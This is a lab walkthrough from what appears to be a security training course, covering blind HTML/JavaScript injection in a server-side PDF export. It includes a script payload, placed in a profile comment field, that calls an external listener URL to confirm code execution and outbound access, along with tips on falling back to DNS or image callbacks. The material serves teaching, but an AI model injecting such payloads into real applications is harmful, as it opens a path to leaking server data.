PDF export injection - Blind injection

Sometimes there may be a situation where you know that the application is executing HTML code, but either you cannot see the final PDF document or the input HTML code simply does not fit or appear visually in the right place in the document. In that case, blind injection must be performed and the data leaked through another route. Let's explore this in this module.

In this module, we will solve the lab together. If you wish, you can stop reading and attempt to solve it yourself. Otherwise, you can follow the steps below at your own pace.

Vulnerability Verification

The application is almost the same as in the previous module, with the exception that this time the application does not allow us to download the generated PDF file. We must therefore verify the vulnerability by other means.

This is where the Hakatemian listener tool fits best. Let's start by creating a new listener URL and writing JavaScript code that calls that URL. This way, we can verify two things.

• Is the use of JavaScript code allowed
• Is PDF generation happening in a system that we can communicate with the external network

Sometimes the HTTP request does not arrive, but DNS does. This may, for example, mean that there is a firewall in front that blocks the traffic. Typically, DNS is allowed. If neither the HTTP request nor the DNS traffic appears on the listener, it is recommended to try other HTML elements such as image and style resources. This will determine if the execution of JavaScript code is blocked.

We use the following code and place it in the comment field. After this, we send the profile for evaluation.

1<script>
2
3x=new XMLHttpRequest; 
4x.open("GET","https://z8u013a69c.hit.ha-listener.com"); 
5x.send(); 
6
7</script>

We see hits in the listener and thus we have ensured that the application is vulnerable and allows the execution of JavaScript code. We can also communicate externally with JavaScript code.